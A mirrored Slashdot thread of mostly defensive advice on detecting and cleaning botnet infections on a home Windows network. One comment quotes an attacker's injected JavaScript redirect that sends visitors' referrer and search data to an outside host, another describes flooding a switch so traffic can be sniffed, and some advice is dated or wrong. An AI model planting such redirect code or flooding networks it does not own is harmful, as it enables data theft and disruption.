Slashdot Mirror
How Can I Tell If My Computer Is Part of a Botnet?
ashraya writes "My father (not too computer literate) has a desktop and a laptop both running Windows in his network back in Hyderabad, India. I set up a Linksys router for him to use with his broadband service. For some reason, he reset the config on the Linksys, and connected it up without wireless security, and also with the default admin password for some time. As you would expect, both of the Windows computers got 'slow,' and the desktop stopped connecting to the internet completely for some reason. As I logged in remotely to 'fix' things, I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs. I did an nslookup on the IPs to see that they were all either in Canada or US, with Comcast and other ISP addresses. Is that a sign that the computers were in a botnet? Are the other hosts part of the botnet too? (I have since rebuilt the Windows hosts, and these connections are not happening now. I have also secured the Linksys.)"
Well the only fool proof way that I can envision is the following
1) Plug you father computer into a HUB ( not a switch, unless it has a special port for this usage)
2) Plug the router into this HUB
3) Plug a Linux machine into the HUB and use tcpdump to examine traffic.
This is what security experts do.
Everything I write is lies, read between the lines.
As you would expect, both of the Windows computers got 'slow', and the desktop stopped connecting to the internet completely for some reason. As I logged in remotely to 'fix' things ...
Quick question, how did you log into his desktop remotely if it "stopped connecting to the internet completely for some reason?"
If all you did was reset the hosts file, it will be back sometime. Somewhere, probably in multiple places on that hard drive, is an executable waiting to be run. It's probably infected some inane looking routine Windows system file that occasionally runs and when that happens your host file will magically change again.
I could recommend you do a netstat but what's the point? Any botnet today would know how to elude that or run as part of a system routine. If the bot is serious enough, your best bet might be to save the data and just do a routine re-install. You know on my parent's WinXP machine, I do that everytime I'm home for christmas. Then I patch it as far as I can over their 56k modem.
Odds are high your dad's machine is still infected and I would also suspect your machine as being potentially compromised if you connected using Windows remote desktop. Call me overly cautious but I don't take chances with Windows.
You can run all the programs you want (Bothunter, Symantic, AVG, AdAware, etc.) but in the end there's no guarantee although BotHunter's probably your best bet.
The best thing to do is educate your dad. If he has a valid copy of Windows, spend time with him to show him how to go to IE and click Tools -> Update Windows then select all updates. Remind him periodically when you talk to him--especially if he does any banking or commerce online!
My work here is dung.
They're likely FUBAR. Burn your dad a Windows CD...
If your OS is OSX, linux, or some other variant of UNIX... you're not part of a botnet.
If your OS is Windows... you're hosed.
look at the activity lights on the whatever you have for networking equipment. If the activity lights go ape after the system comes up, and stays that way, back up what's safe and reload it.
I work for the Department of Redundancy Department.
Overseeing a small office lan, I've come to the conclusion that you will be infected whether you like to or not. Regardless of how much you threaten users. I've resorted to using an drive image (paragon) saved on a drive partition which saves the system in a uninfected state. As soon as a user goes 'uh ooh' or complains of slowness I restore the image (keep in mind data is stored on a server which is backed up and scanned on which no apps are allowed to run). I also run a combination of ccleaner, spybot s&d and windows defender.
In addition I check the network once a week for mail or ftp sockets ( evidence there is a bot net at work). So far this has been the easiest way to stay on top.
I LOLed
...or your dad is downloading stuff from a p2p network....
Close all programs
c:\>netstat -b
Love many, trust a few, do harm to none.
Fire up a command prompt and type
netstat -a | find "LISTENING"
to find out what ports your system is listening to. Running the netstat command will give you all the traffic. Should give you a good idea as to what is happening. (Helps to close all of your 'normal' apps)
+++ UGUCAUCGUAUUUCU
If I had that kind of suspicion and if it was router itself I was suspicious about, I would simply get the latest stable firmware for that particular model (be careful) and simply reinstall it over the router itself. It would be something like "format and install windows" I wouldn't really backup any settings on that case. Just make sure you know ISP login and pwd. Make sure they work, they haven't been changed at any point or you will end up speaking with Bangalore at 4 AM :)
A simple,fast port scanner exists at http://www.grc.com/ (shields up!) which really works, ignore Mr. Gibson's weird named inventions like "nano scan" etc. What I know is, it works. Oh also ignore its port 139 or "you aren't stealth" paranoia. 139 is client port and stealth would be good but you won't really die if you have nothing served.
For clients, don't re invent the wheel. NMAP is there, free and can run under win32 if you need. http://nmap.org/download.html , some instructions exist for detecting current security threats but I didn't really check since it is all OS X here, we have different issues than win32.
It's just Computrace.. Don't worry -- it will come back on its own.
What it really means is that your dad is a part of an international crime ring and he really is a cracker, without your knowledge. He just felt that you did not have a clue so allowed you to play with his computer.
I prefer the "u" in honour as it seems to be missing these days.
I think he's using the term "hosts" in a different fashion than you are thinking he is. "Hosts" as in servers rather than "hosts" as in a hosts file. I could be wrong, though.
Boot into safe mode, then use a tool such as Autoruns by Sysinternals to see what's starting when Windows loads.
On an infected system you will see a number of drivers and shell extensions that are not a part of a standard Windows installation. Some of them may be things that were installed by the user, but most of them are malicious software.
Of course, getting rid of that stuff is an entirely different question.
The saddest poem
Well you can join BOINC to donate your left over cpu cycles.
You can join a botnet to donate your left over bandwidth.
It's only nice.
Doesn't work in XP.
C> netstat -a | find "LISTENING" [ENTER]
Response: NETSTAT is not not recognized as an internal or external command,operable program or batch file.
On boot it say "Welcome to Microsoft Windows"
I would also suspect your machine as being potentially compromised if you connected using Windows remote desktop
Citation needed.
It's either going to be a running process with startup entries and visible exe or DLL or whatever files, and then it's simple to find, or it's going to be hiding itself somehow. In the second case, use Rootkit Revealer. It's free and basically 100% heuristic with no definitions file at all. It just looks for inconsistencies between the registry and file system or something like that. I don't think any rootkits can hide from that.
Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
Most low-end switches will *become* hubs when you start shoving enough traffic through them that they can't queue it anymore. Fill up the ARP tables with crap really rapidly while transmitting, and they'll fail into dumb broadcast...
The rubotted tool does a pretty decent job of detecting most botted computers. Have your dad download it here:
http://www.trendsecure.com/portal/en-US/tools/security_tools/rubotted
You could also look for his system on the dronebl:
http://dronebl.org/
Good luck!
Get Autopatcher and update it from a CD BEFORE you connect it to anything.
- - - - - - - - - - -
I am a programmer. I am paid to produce syntax not grammar. Deal with it.
It makes remarks about wanting to try other operating software. It's unusually concerned about antivirus protection. Plug and Play only works with force-feedback devices. It makes unusually long "hand-shakes" with the email server. It accuses you of installing spyware. It asks you to run your network scans in promiscuous mode. It tells you that it's mainframe never liked you.
A free lightweight network intrusion detection system for UNIX and Windows (http://www.snort.org/) should be able to detect any anomalous behavior.
Your Dad was just torrenting porn.
I will not be pushed, filed, stamped, indexed, briefed, debriefed or numbered. My life is my own.
In the time it took to scan the PC, check logs, and post this question, you could have restored your PC image and been off and running clean again.
You do make an image of your Windows PC, right? You wipe and reload the image regularly, right?
If you are going to use Windows, treat it like a needle or syringe. They make them cheap and disposable for a reason. Do not reuse. You can reimage in 30 minutes. Do this once a month or more often as needed.
Your monthly Windows Update after the reimage will probably take longer than the reimage.
Build a new image every 6 months or so, and after each service pack, obviously.
spend time with him to show him how to go to IE and click Tools -> Update
Not to be a troll, I was from Hyderabad too.
There is a little chance that this XP is a "genuine" one to allow updates.
-- It is the mark of an educated mind to be able to entertain a thought without accepting it. -- Aristotle
I have seen this happening with a computer running Skype.. Is your dad running Skype? Tell him to kill the Skype process in the system tray & see if the problem goes away.
XP Home sp3
Guess it's Borked
While my father was cleaning his gun, he loaded it and emptied the clip into his foot. He then reloaded and pumped another four slugs into the same foot. So I was wondering, does any one know where I can get a good deal on Band-Aids? Thanks.
No folly is more costly than the folly of intolerant idealism. - Winston Churchill
Let me add to your list of cleaning tools. http://www.malwarebytes.org/
And please! For the love of Linux, remove Symantec products from your list.
Format and reinstall, if is the only way to be sure.
If I were God, wouldn't I protect my churches from acts of me?
Aren't all Windows machines part of botnet by default? Microsoft?
For some reason, he reset the config on the Linksys, and connected it up without wireless security, and also with the default admin password for some time.
He probably just stuck a pencil in the reset button. Maybe because he was having connection problems for some other reason and that "fixed" it and he was happy. Ignorance is bliss ... for a while.
Research shows that 67% of those who use the term "research shows", are just making shit up.
Would wireshark work to capture traffic going to the botnet? Isn't it IRC traffic so you could just sort by that traffic type?
One word:
malwarebytes
Detecting and removing botnet software is its purpose in life.
http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?tag=mncol
And as you tread the halls of sanity, You feel so glad to be, Unable to go beyond. I have a message, From another time..
He is in the hub of all Computer tech support nowadays - why are you asking the rest of the world - get someone local to fix it.
For a suspicion? Good luck with that.
A good many replies here - so I will answer a few questions that have been asked.
1. For this time, I assumed the systems were owned, and they have now been rebuild (Windows Reinstalled).
2. The Linksys is re-secured - but I hadnt thought of that being owned - so I have to now do a firmware upgrade on that - Thanks for the suggestion.
3. Other suggestions are to confirm botnet or sniff traffic - I am in the UK, and I can only do so much remotely.
4. One of the quesions was how I managed to remote into the windows hosts - No, I managed to remote into the Linksys, not the windows hosts.
5. The bizzarre situation in the Windows host before it was rebuilt was that if we did (I told the commands over the phone for my dad to execute) ping or traceroute to a destination like www.google.co.in, it would work. It would resolve the right IP. However, with any of the browsers, as soon as access to a site was attempted - We would get a message "Connection Reset" or the browsers equivalent. (Firefox, Chrome and IE tried). Has anyone seen that one before?
6. Another question asked was if the Windows in question was legit - Yes, I bought him a OEM XP the last time I was there and installed it.
Regards,
Ashraya
I remember from my Sun Solaris 8 network or sys admin class that they said the system will automatically configure itself as a gateway between two network cards. When my son gets old enough to start surfing on his own, it's what I intend to do. I've got an old Solaris 8 machine on an Ultra 10. I can put it out in the garage (next to the cable modem) and have it be a physical hop between the cable modem and Dual Band WiFi router.
Running wire shark on the computer that might be infected is useless. Really nasty malware has the ability to hide it's traffic even from packet sniffers on the local host. I find the best bang for the buck is using a passive network tap and plug a sniffer into that. Now.. no need to go out and buy one as that will be expensive.. you can build one($18). http://www.instructables.com/id/Make_a_Passive_Network_Tap/ If you want to one-up this then get pc and install a network-based Intrusion Detection System(IDS), google snort, it'll look for abnormal network traffic patterns, and you can even configure them to notify you if it does detect something. Also.. take that linksys router and install DD-WRT on it and configure the firewall to block everything except what you know to be okay. Note: you can disable the reset button in DD-WRT =)
Wipe out the disk completely, and reinstall Windows.
If you want to do an analysis later, make an image of the disk before wiping it.
Run the image in an isolated network, where you can watch what's going on on the wire, but you are not causing harm to other computers.
Slashdot is doing tech-support for India now?
Some chick named Alanis is calling you subby.
Q: How do I tell if my computer is part of a botnet?
A: If it's got Windows on it, it is.
Use wireshark to hunt down your network from your router or via airtun (in aircrack) to scan the network from a computer.
Is it running windows?
If you are seeing netbios over tcp (port 445) traffic and he is not uploading/downloading files via the "My Network Places" interface he is most likely infected with a trojan.
If your seeing random high port to random high port traffic (ports 1024 - 65535 connecting to another ports 1024-65535) and he isn't doing P2P then he most likely is infected and the infection is trying to set up the machine as part of a bot net and trying to infect others.
If you are seeing UDP traffic on a consistent port on his machine to random high ports (1024-65535) on the outside, his machine is an active server in a bot net.
Having to work for a living is the root of all evil.
You've rebuilt the windows machines? So, now you can not at all be sure if they were part of a botnet or not.
Chances are they were, and you've done the right thing by rebuilding them.
I think the details about the router with it's default password an no wireless security is a red herring - I've not heard of a botnet that tries to get in to your network by guessing standard admin passwords for common wireless routers. More likely it was a drive-by download from a dodgy web page, or a trojan in some downloaded software that put the malware on the machines.
Specialist Mac support for creative pros, Melbourne
If you are running Windows, you are part of a botnet. If you are running a real operating system, your system is clean. Simple, huh?
Buy Text Processing in Python
+1 Flamebait
This worked for me: Take a really sharp knife and carefully scrape away the insulation on a section of the wires between your computer and the router. I like to take some duct tape and make a closed loop with the sticky side out. I stick one side of the loop to a flat surface and then stick my wires to the exposed sticky side. This does a pretty good job of keeping the wires secure. You'll then need to develop a quark microscope capable of recording video (I had one but I misplaced it when I moved out of my old apartment). Aim the scope at the exposed wires and hit the record button (mine was red). Type out an email containing every possible character and send it through the wire as your control case. Use this data to translate the electron patterns in the video into discernable information. Monitor the video for several hours. If you see the word "girth" in any outgoing data, you can be pretty sure you've got yourself a bonafide (no pun intended) botnet. If you find a botnet in your system, all you need to do is cut the exposed wires and it won't be able to talk to the internets anymore.
In today's world you're dad's systems are owned!
I have fought enough with MS systems to know, just nuke it and start over... I think Microsoft should start naming their Operating Systems starting with Swiss Cheese Business, or better yet Ben Dover Professional!
Ugh....
My own Linksys router reverts to wireless network enabled, and without security. All it takes is the power to go out, and back on again, and Boom! you're wide open. Furthermore Linksys never offered a patch or recall or anything later, They accept this is OK.
(If at first you don't succeed, do it different next time!)
> I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs.
There is probably more than 1 thing going on here.
The machines are probably hacked. If they are, they will have some kind of a control channel. However, C&C is frequently subtle and hard to spot.
The behavior you describe is typical of a number of P2P VOIP applications. Skype is the most likely alternative.
If it is Skype, your chance of compromise is actually increased. I have observed attackers gathering lists of Skype peers (and BitTorrent peers as well.) They appear to believe that these lists provide a fruitful source of vulnerability for further attack.
Miles
Not if you run it from a LiveCD on a dedicated system that you have set up with a bridge like the post above.
I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs. I did a nslookup on the IPs to see that they were all either in Canada or US, with Comcast and other ISP addresses
Hey dad, you see that donkey icon in the system tray, next to the time ? Now right click on it and choose "Quit".
I see a lot of switch/gateway logs with connections like you describe. 85-90% of the time it is actually BitTorrent/Limewire/other forms of P2P traffic.
Sounds like Dad, if that's even his real name, knows more about computers than he is pretending to.
He is clearly torrenting, and your best course of action would be to report his nefarious actions to the authorities.
While we are on a topic of security:
Several months ago I started using Debian as my primary OS at home. I am very happy with it, but don't know much about how to keep it secure or how to tell if I had been compromised. Of course very basics are clear: I do not use root except in those instances of updates, etc. The consensus on this site is that if you run Linux then you are invincible, but I respectfully disagree. The system is only as secure as the competence of the user.
To cut the long story short:
- What do you normally do to make sure that your Linux system is clean? Is running apt-get upgrade regularly enough or is there more to it?
- What articles or books would you recommend to a newbie in this area? I am fully willing to RTFM as such, but please at least give me at least some direction on what to search for.
- Any other general tips, advice or wisdom would you be willing to share?
Thank you
As it's booting, if you see a logo that reminds you of Simon at all, chances are it's enslaved in a bot net. Daaamnnn yooouuuu Hasssbrooooo!!!!!
Admit it. You post strawman arguments as AC so you get modded Insightful for refuting them, rather than Troll
Is to sit down with your father and gently explain to him the perils of surfing the internet unprotected. Had he done that I am sure that this wouldn't have happened in first place. Not to mention that fortunately this was simply an infection that could be cured. Your father should be thank-full that there is no pregnancy involved. Something to keep n mind for the next he is out sowing his wild oats.
I have mod points and I am not afraid to use them.
...also throw in SuperAntiSpyware, AdAware, and Process Explorer. I've found 5 unknown viruses with Process Explorer in the last 4 months, and 3 probably unknown just yesterday.
Your father's computer could also have had spam smtp engines installed and controlled by a botnet. Honestly, I would try and steer your father to using Ubuntu or Linux Mint which is a much more secure computing platform than Windows. You could install and configure it for him. Basically, your dad probably uses the computer for basic office stuff and email so a Linux distro would be better for him. He would have to worry less about a botnet infection.
It comes with a logo; looks like a window. :)
--- For a good time mail uce@ftc.gov
Ever heard of Wireshark?
if you run windoze you are anyway in one or another botnet. the only difference between them is the fact that you got to pay for some of them while others are free :-). by the way: why are you so worried about being part of a botnet? if you're a windoze user that's the best thing that can possibly happen to you. for example do i tend to remove all other malware from the machines that are in the botnet i administer. i really try to get them as secure and stealthy as possible. just give me your ip address and i will show you what i mean (free of charge of course!).
...so I downloaded the Bothunter executable only to discover that it did not have a valid digital signature. WTF? A security program that's not authenticatable?
If you are going to fart around that much, you might as well build a new install CD with SP3 slipstreamed in and the most recent hotfixes set to run on install:
http://www.nliteos.com/guide/part1.html
I have built such a CD from the I386 folder on my harddrive (my laptop came with a recovery partition, not a CD) and successfully installed it into a virtual machine.
Nerd rage is the funniest rage.
Right?
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
If the bogus netstat (and other utilities) are already part of the rootkit the skript ciddey downloaded, it doesn't cost the skript ciddey any more effort, and is even less likely to be noticed than strange output in netstat.
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
Tell your dad to stop browsing for American porno.
Maybe you already know, but if you don't, you should look up "Slip Streaming". With "Slip Streaming" you copy your install CD to your harddrive, "Slip Stream" the Service Pack files in, then create an install CD that will at least install the most recent Service Packs. Saves from having to go through all the old Service Packs on reinstalls.
He did say he has since rebuilt the machines, whatever he might have meant by that.
Also, the way I read it, he was saying he'd logged into the router/modem. (Which was also probably also compromised, but at least he wouldn't be sharing desktops with it.)
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
First, many bot kits now are lower profile, deliberately not taking all the bandwidth available. That's going to reduce activity on the idiot lights.
Second, the odds that the modem/router was itself also compromised are not small, and many of the cheap ones feed the idiot lights through software. (Do I need to say more about that?)
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
> How would a video file deliver a virus payload?
...via a trojan in the video file's drm protection layer as far as i can make out.
although to date this only seems to apply to .wmv files (thanks microsoft). the issue was originally reported in 2005, so i don't know whether it's very common, or indeed if it's still an issue nowadays.
for more info see here:-
http://seclists.org/bugtraq/2005/Jan/0130.html
Or are you talking about the known good machine which he brought with him, running (preferably a stripped down Linux or BSD) in stealth/promiscuous mode?
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
root kits these days even muck around with bios.
safe mode isn't safe any more. Hasn't been for quite a while.
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
Be safe, wipe windows.
There's no positive way to determine whether a machine is clean after an infection. If you even suspect infection, wipe and start over.
Or just give him a 'Live Ubuntu CDROM' to boot and run for online use. He'll be safer than 99.99999999% of the internet users.
Next time power goes down, the Linksys is going to be reset.
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
Do you guys remember when John Carmack used to post here? Now look at this place. AOL news is more tech-savvy. Ugh.
As you would expect, both of the Windows computers got 'slow', and the desktop stopped connecting to the internet completely for some reason. As I logged in remotely to 'fix' things ...
Quick question, how did you log into his desktop remotely if it "stopped connecting to the internet completely for some reason?"
When you combine "noticed on the Linksys' log" with "As I logged in remotely" and combine that with the fact that the machines don't have internet access you can assume that he logged into the router remotely and not the PCs in question.
-----
If all you did was reset the hosts file, it will be back sometime. Somewhere, probably in multiple places on that hard drive, is an executable waiting to be run. It's probably infected some inane looking routine Windows system file that occasionally runs and when that happens your host file will magically change again.
I'm guessing you that you assume he just reset the hosts file because he used the word 'hosts' and didn't put it into context that a) there are 2 machines that are being discussed, and b) he used the word rebuilt, which implies clean install or to reassemble (the software). So, the statement "rebuilt the Windows hosts" more than likely is referring to the two computers and not the hosts file itself.
I could recommend you do a netstat but what's the point? Any botnet today would know how to elude that or run as part of a system routine. If the bot is serious enough, your best bet might be to save the data and just do a routine re-install. You know on my parent's WinXP machine, I do that everytime I'm home for christmas. Then I patch it as far as I can over their 56k modem.
-----
He is clearly capable of verifying the network activity of these machines outside of Windows as his entire suspicion is coming from the Linksys firewall log entries to A LOT of IP addresses and odd ports:
As I logged in remotely to 'fix' things, I noticed on the Linksys' log that the laptop was making seemingly random connections to high-numbered ports on various IPs
Odds are high your dad's machine is still infected and I would also suspect your machine as being potentially compromised if you connected using Windows remote desktop. Call me overly cautious but I don't take chances with Windows.
Odds are a funny thing but IMNSHO I must firmly disagree with you. Your suspected actions (of resetting the hosts file in Windows) should not have eliminated the behavior he was seeing. Modifying the hosts file isn't necessary at all to connect to a botnet. You do all of that via IP (or a legitimate lookup). Now, spyware will change the hosts file because it would benefit to maliciously redirecting the users requests. If you are operating autonomously then you have no need to make that change.
-----
You can run all the programs you want (Bothunter, Symantic, AVG, AdAware, etc.) but in the end there's no guarantee although BotHunter's probably your best bet.
The best thing to do is educate your dad. If he has a valid copy of Windows, spend time with him to show him how to go to IE and click Tools -> Update Windows then select all updates. Remind him periodically when you talk to him--especially if he does any banking or commerce online!
Defense in depth has never been more important. This advice is great but it doesn't go far enough. At minimum:
A self-updating antivirus package (or two, but only one with real-time scanning)
A regularly scheduled scan (of AV (again, even with two as nothing can nor will ever be perfect) and malware)
Automatic Windows updates (because otherwise they'll never do it)
A monthly scan with Secunia's Personal Software Inspector to update all of your other applications
Some other advic
When your computer comes alive and starts sending messages to Megatron, then you will know.
and the kneejerk reaction is not as valid as it once was, but have you tried talking him into giving up MSWindows?
I know, I know, easier said than done, and, these days, even Linux and BSD are having a hard time staying clean. (I'm sure that costs Billy G. a small donation or two a week. Sorry. You didn't want to hear that, either. I didn't say it.)
That modem/router is going to get reset again, hit by power or something. Depending on which model you're using, you can install a small Linux or net/openBSD distribution and reconstruct it so you can keep him from resetting it. Or maybe get a low-power PPC or ARM based NAS-type box (like the Kurobako), add disk drive and necessary ports (not sure what you'll need to hook to the WAN in India) to replace it and keep it more under your control.
As advice, it's good. Financially, and time-wise, I'm not able to do it in my house, yet. But it's something we all really need to start doing. Relying on ISPs who have do not have great incentive to help customers keep their kit clean is not a good idea.
If I had a couple of million in capital, I'd take a break and see what kind of packaged solution I could put together and sell -- very small ARM or coldfire processor as a tripwire watchdog, a medium-sized ARM with a small notebook or flash drive for meaningful logs as the firewall/router.
For my purposes, I'd have another ARM processor with a small notebook drive serving DNS on the inside of the LAN. (Stupid ISP is telling me to change my DNS setting to DHCP, so I want to start checking their DNS server against a third-party DNS server.) and another for serving timestamps, and another serving my personal website. And all of these could fit in one small physical box, really.
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
"netstat -a | find "LISTENING"" - by (H)elix1 (231155) * on Thursday August 06, @05:08PM (#28978877) Homepage
Good idea, & I tend to use THIS commandline though:
netstat -an
OR
netstat -ano
Which will show ALL listening endpoints, inclusive of local ports and remote ones...
NOW, my point here? Don't trust netstat alone... because, like ANY application, it can be messaged or hooked (like what you see quite a few malwares nowadays do) to supply erroneous OR incomplete data...
Thus, I recommend some other tools, to supplement & doublecheck it: Those tools being -> TcpView from SysInternals (Dr. Mark Russinovich & Bryce Cogswell, & Microsoft owns them now)...
Another EXTREMELY USEFUL TOOL that sysinternals has, for the purposes of determining IF you are running ANY "weird programs", is their Process Explorer tool!
Process Explorer - it has several advantages over Windows' own native taskmanager, in that it can "break out" subordinate process lists under svchost.exe (what brokers libs/dlls run under it for various system services)... &, since many a malware today attempts to exploit that to hide from std. TaskManager? This program CAN "expose them", if they attempt to hide under svchost.exe... & then, it can also be extremely useful in DESTROYING said malware/botnet control executables as well (more on that in my P.S. below, as to details of the "how" of it, pretty easy to do).
APK
P.S.=> Process Explorer can produce a DLL View listing of a process' own subordinate libs/dlls called or other exe's brokered by it (after you use Process Explorer's VIEW menu, & Show Lower Pane submenu, + choose the Lower Pane View submenu option)...
Then, once that's in place, start hiliting processes to examine in its left-hand side list pane... & once there, start looking @ the DLL view list pane below, & if you see ANY that you are not familiar with?
You then search them online & most times, many of the "malware libs" & exe's are already known & you can simply "Freeze" (suspend) the parent process (halting it temporarily, doubtless via messaging it with HLT instructions or otherwise similar calls) & then, suspend said lib being used for malware control!
Lastly/Finally, delete said bogus lib/dll or exe on disk (this is done because many/most times, when a lib's being called this way, it is not possible to otherwise delete said backing lib or exe file from disk, because executables "page back" to themselves upon pagefaulting, & when in use this way? They cannot be destroyed typically.)... apk
Is it running windows? Then its part of a bot-net.
---- Booth was a patriot ----
your computer wouldnt have fail you as it has.
I've read this entire thread and learned that it's impossible to tell if your computer is part of a botnet.
--I'm so big, my sig has its own sig.
-- See?
Your father was simply downloading porn through p2p.
This won't prevent a bot but at least limit its traffic with little impact. On your/his router, only allow 53 to your ISP's DNS servers, 25 to your specific ISP mail servers, port 80 and port 443. Nothing else. I did this for years on my kids computers and there were very little side effects. Sure, if he is a computer guy he may want more ports, like usenet, bittorrent, ftp etc as required but I'd bet 99% of regular computer users don't use anything other than the short list of what I mentioned above. Another addition is limit what I said above to a single IP address that his computer has, if he needs something else, he can change his IP and change it back when he is done.
Last week I was victim to an exploit in an older version of Coppermine, a photo-sharing app. The culprits uploaded a number of php scripts. Most scripts were designed to provide readily-indexable terms and phrases to search-engine spiders. If unwitting googlers went to the page, they were redirected to a fake anti-virus site which encourages you to download a trojan.
Interestingly, before redirecting the user to the fake site, the user's search terms (in addition to other data) were forwarded to a server in Russia. Presumably this was to continually optimize the index terms to those actually being searched for.
The code had been on my server for less than 3 days. After removing it, I still got 100s of hits from unwitting google and yahoo searchers.
A quick search of my own on google revealed 1000s of compromised servers. Wanna have fun with the black hat's server? Here's the relevant line from their scripts:
window.location = ("http://luckystats1.com/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
Does it say "Start" ?
:)
Botnet.
Windows is not the answer.
Windows is the question.
The answer is "NO."
If you go to YouTube and search for "Xbox host booting", there are shitload of tutorial on how to setup a botnet to kick somebody in a Halo 3 session so they win automatically. They all use UDP port 3074. If you see that then you know that on the other side is some kid who couldn't lose a game.
New Economic Perspectives
Download and install Wireshark from http://www.wireshark.org/
Fire it up and watch everything on the NIC
---- "Logoff! That cookie shit makes me nervous!" - A. Soprano
He's just torrenting porn...
We are the 198 proof..
> I have also secured the Linksys.
You're lucky it wasn't hijacked and bricked
- You know that a politician is lying, if his lips are moving. :P
- You know you have a botnet zombie if you're using Windows.
My parents live overseas as well. I try and help them as much as I can from here. I tried once to convert them to Linux but that did not go well.
The university I used to attend came up with a pretty neat way to maintain their windows desktops clean. I believe the machines were booting linux but they would immediately launch vmware player running windows on it. The end user could barely even notice that the machine was not booting straight on windows. All the desktops were rebooted every night and the next day a fresh copy of the vm image was ran. If you wanted to save anything, you had to save it in a USB drive because on the next day the machine was clean again. I think this might be the best solution to support my parents overseas. Comments anyone? What do you all think?
Botflies deposit eggs in a host body, or sometimes use an intermediate vector: common houseflies for example. The smaller fly is firmly held by the botfly female and rotated to a position where the botfly attaches some 30 eggs to the body under the wings. Larvae from these eggs, stimulated by the warmth of a large mammal host, drop onto its skin and burrow underneath.
Eggs are deposited in animal skin directly, or the larvae drop from the egg: the body heat of the animal induces hatching upon contact. Some forms of botfly also reside in the digestive tract when consumed by a licking action.
Myiasis can be caused by larvae burrowing into the skin (or tissue lining) of the host animal. Mature larvae drop from the host and complete the pupal stage in soil. They do not kill the host animal, and thus are true parasites (though some species of rodent-infesting botflies do consume the host's testes/ovaries).
how did you log in to fix things when it was not connect to teh internets? Seriuos.
Re: Question 5. I just cleaned a computer displaying similar behaviour the other day. It took GMER from http://www.gmer.net/ to disable and remove the rootkit's dll on the machine I was working with. After that, I was able to run MBAM, install free avg, and had the system running very well.
...how this was tagged "windows" because it had botnet in the title as if no linux machine has ever been turned in to a zombie.
While setting up a dedicated IDS is something that would be good in an office environment... we're talking about a novice home user here. Frankly, much of the advice given on here is overkill or irrelevant (ie. installing OSX or Linux isn't a solution).
Here's what you need (of course, him being in India may throw a wrench into the availability of some of these solutions).
First things first, AntiVirus absolutely must be up to date. I recommend AVG Free... as the price is right. Unless he wants to get (or has access through his job as some do) Symantec AntiVirus Corporate Edition (which doesn't include all the bloatware).
Second, make sure Windows Defender is downloaded (http://tinyurl.com/kujpsj for the India site) and up to date.
Third, run all Windows updates.
Fourth, an additional Adware/Malware remover is a good idea... Lavasoft's Adaware is userfriendly and picks up 99.9% of problems.
Fifth, do all that fun spring cleaning, (delete old restore points, clear temporary files, defrag the hd, etc)
Finally, check which security features are on his router. There have been some router worms going around. Check out this article to fix/lock down the router...http://tinyurl.com/ddt7l6
If none of that works... back up the data, and do the old Windows reinstall. Before restoring your data, have him bring it to the Indian equivalent of Geek Squad (or whatever computer fix-it shop) and have them run a virus scan on the backed up data.
If he's still having slow computer problems... then the hardware is just going on him (as with a fresh install of Windows, it should run pretty smoothly)
Here is my patent-pending Karma Burning Algorithm (TM):
if( GetOperatingSystem() == "Windows" ) return true;
else return false;
Simple!
is to ask yourself "Is my computer running Microsoft Windows?"
if the answer to that is "yes", then your computer is either already running a botnet or will be soon.
Switch to linux, then you'll know that it is not a Botnet
Unplug it. This Internet business is overrated anyway. Though, I wouldn't be suprised if a Windows machine managed to get infected even disconnected from the world.
Seriously, I've had process explorer in my kit for a while, but haven't used it for much lately. Have you tried Malwarebytes, I wonder why it's not on your list. FWIW if you can't boot your system at all one of the guys from MBAM suggests Avira http://www.free-av.com/en/products/12/avira_antivir_rescue_system.html haven't tried that one yet, but it's on my list of potentials, so I'd love to hear if anyone has worked with it.
Under the influence of Post-Cyberpunk Gonzo Journalism
"FWIW if you can't boot your system at all one of the guys from *the* MBAM *forums* suggests Avira "
Sorry, had to fix that.
Under the influence of Post-Cyberpunk Gonzo Journalism
http://www.raymond.cc/blog/archives/2008/12/11/13-antivirus-rescue-cds-software-compared-in-search-for-the-best-rescue-disk/
Meh, there's a comparison of boot discs. Looks like the best by this eval is the Kaspersky rescue disc, but Avira runs a close second.
I find that believable, Kaspersky is a great AV program, I highly recommend it.
Under the influence of Post-Cyberpunk Gonzo Journalism
Yea, if you're reimaging off of the install disk this is the best way to go. Automate the darn thing, leave it unattended, forget about entering license keys, or clicking "next" a thousand times. Drop the disc in and hang with your parents while you're there.
Under the influence of Post-Cyberpunk Gonzo Journalism
There are some very inexpensive UPS enabled power strips today. APC makes a bunch. Just pick one up and make sure only your hardware router/firewall and hubs (if you use them) are plugged into it. With that light of a load, they will run longer than a larger UPS hooked up to your monitor and tower PC. Lets face it, if the power is out more than 30 minutes today, most home UPSs will run out of battery power before the smaller one dedicated to the modem and router/firewall. At least that has been my experience.
I put larger UPS hardware next to my primary work tower and (servers + big screen TV) and put a smaller less expensive UPS for my routers, modem, hubs. In the last two years I lost power for longer than 30 minutes only once. It was a no brainer shutting down everything before the UPS battery was completely depleted.
I was able to watch a 42 inch TV for 20 minutes before I had to turn it off, because the power did not come back on. So it is a pretty big UPS for a home. At least I do not have to worry about brown outs any more. The lights blink, no worries.
I turned the larger one off about 10 - 15 minutes before the smaller one keeping the modems and router/firewall hardware up ran out of juice. (I had a firewall/router, dumb hub and cable modem on that one smaller UPS, no problems and nothing else.)
Short answer? Yes.
If your computer is running Linux, Unix, OS/X it's not part of a botnet.
If your computer is not on any network it's not part of a botnet.
If your computer is running windows you take your chances.
